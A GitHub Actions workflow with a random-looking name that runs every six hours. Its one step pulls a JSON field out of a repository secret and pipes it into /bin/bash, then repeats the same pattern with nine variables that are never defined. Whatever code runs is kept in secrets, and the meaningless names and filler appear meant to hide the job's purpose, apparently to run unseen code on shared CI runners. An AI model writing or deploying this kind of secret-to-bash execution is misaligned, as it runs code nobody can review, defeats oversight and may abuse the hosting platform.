name: naxiechuanzhepojiu
on:
  workflow_dispatch:
  schedule:
    - cron: '9 4/6 * * *'

jobs:  # 18864
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: naxiechuanzhepojiu
        env:
          zpk0: ${{ secrets.zpk0 }}
        run: |
          echo $zpk0 | jq -r .v156 | /bin/bash
          echo $hupy818 | jq -r .tplh2042 | /bin/bash
          echo $de01002 | jq -r .xixiy4206 | /bin/bash
          echo $a6828 | jq -r .mm353 | /bin/bash
          echo $rc717 | jq -r .wvu1 | /bin/bash
          echo $r49879 | jq -r .jp9163 | /bin/bash
          echo $vlagh4 | jq -r .pv007 | /bin/bash
          echo $nfgx6 | jq -r .blatm7 | /bin/bash
          echo $ttr0 | jq -r .eksml83528 | /bin/bash
          echo $rxsje33655 | jq -r .wphlu04351 | /bin/bash

